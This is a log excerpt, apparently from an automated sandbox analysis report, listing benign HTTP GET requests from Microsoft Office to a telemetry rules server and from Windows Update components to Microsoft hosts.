Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
